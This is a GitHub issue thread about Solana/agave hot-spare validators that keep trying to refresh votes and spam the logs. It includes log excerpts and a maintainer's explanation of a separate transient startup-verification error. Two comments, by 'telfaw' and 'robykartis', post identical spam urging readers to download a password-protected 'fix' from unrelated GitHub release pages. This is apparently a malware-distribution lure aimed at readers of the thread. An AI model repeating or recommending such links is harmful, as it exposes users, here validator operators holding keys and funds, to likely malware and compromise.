### ISSUE TITLE
Hot spares will attempt to refresh votes which creates log spam

### ISSUE THREAD

**Issue by AshwinSekar** [anza-xyz/agave#2768]
#### Problem
Previous efforts:
https://github.com/solana-labs/solana/pull/32315
https://github.com/solana-labs/solana/pull/34737

Non voting validators (`--no-voting`) have no authorized voter keypairs which is correctly signaled not to refresh.
However hotspares will have an invalid identity keypair, this is not handled - still leads to `GenerateVoteTxResult::Failed` which will be eligble for refresh.

#### Proposed Solution
Add another case for hotspares to avoid refresh. 
Also since authorized voter keypair and identity can be adjusted on the fly, allow for refresh if those are changed. 

#### Example
This is hotspare from Pumpkin (https://discord.com/channels/428295358100013066/560174212967432193/1278376793455202418):
```
[2024-08-28T15:39:49.682690040Z WARN  solana_core::consensus] Trying to refresh timestamp for vote on 289850363
                         using smaller heaviest bank 289850363
[2024-08-28T15:39:49.682717395Z INFO  solana_core::replay_stage] Vote account node_pubkey mismatch: Poo1fGex6LzoVSn1kkQcvTamyK8J4FvKnEUeZhkd9Bv (expected: 5JjSDGpppMmmVo97ZFnMkDgCFhyrH4aU7ZBHPDmzcZAK).  Unable to vote
```

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ferric-sol** [comment]
Hi @AshwinSekar - looks like I ran into this too, while doing set-identity, or perhaps before that? 

v2.1.11

```
[2025-02-04T05:06:41.945376119Z WARN  solana_core::consensus] Trying to refresh timestamp for vote on 318353441
                         using smaller heaviest bank 318353441
[2025-02-04T05:06:41.945434777Z INFO  solana_core::replay_stage] startup verification incomplete, so unable to vote
[2025-02-04T05:06:42.045653127Z WARN  solana_core::consensus] Trying to refresh timestamp for vote on 318353441
                         using smaller heaviest bank 318353441
[2025-02-04T05:06:42.045720498Z INFO  solana_core::replay_stage] startup verification incomplete, so unable to vote
[2025-02-04T05:06:42.145929564Z WARN  solana_core::consensus] Trying to refresh timestamp for vote on 318353441
                         using smaller heaviest bank 318353441
[2025-02-04T05:06:42.145992850Z INFO  solana_core::replay_stage] startup verification incomplete, so unable to vote
[2025-02-04T05:06:42.180559498Z INFO  solana_metrics::metrics] datapoint: poh-service ticks=183i hashes=11453312i elapsed_us=350325i total_sleep_us=355608i total_tick_time_us=46i total_lock_time_us=3983i total_hash_time_us=588316i total_record_time_us=0i
total_send_record_result_us=0i
[2025-02-04T05:06:42.202436281Z INFO  solana_metrics::metrics] datapoint: relayer-heartbeat fetch_stage_packets_forwarded=0i heartbeats_received=0i
[2025-02-04T05:06:42.246203748Z WARN  solana_core::consensus] Trying to refresh timestamp for vote on 318353441
                         using smaller heaviest bank 318353441
[2025-02-04T05:06:42.246264971Z INFO  solana_core::replay_stage] startup verification incomplete, so unable to vote
[2025-02-04T05:06:42.304683533Z WARN  agave_validator::admin_rpc_service] Identity set to ETcW7iuVraMKLMJayNCCsr9bLvKrJPDczy1CMVMPmXTc
```

kept getting startup verification incomplete, unable to vote even after set-identity... not sure what i could've done differently, the snapshot i downloaded on restart was from one of the anza known-validators, i have the ledger and logs if you'd like to take a look

**Comment by AshwinSekar** [comment]
This is a separate issue `startup verification incomplete` is a transient error that means your validator's accountsdb hash verification has not yet completed.
Once this hash verification finishes (should be quick after startup), the validator will start voting.

How long did you leave it running? Was this with a well specced machine?

**Comment by ferric-sol** [comment]
> This is a separate issue `startup verification incomplete` is a transient error that means your validator's accountsdb hash verification has not yet completed. Once this hash verification finishes (should be quick after startup), the validator will start voting.
> 
> How long did you leave it running? Was this with a well specced machine?

Yep, decently specced but low RAM (7960x/256gb) I dropped the --no-skip-initial-accounts-db clean flag, so background account hasher started but never completed (never saw "Initial background accounts hash verification has stopped") and I did a set-identity in the middle. It was caught up which threw me off. Dumb mistake. Ignore me.
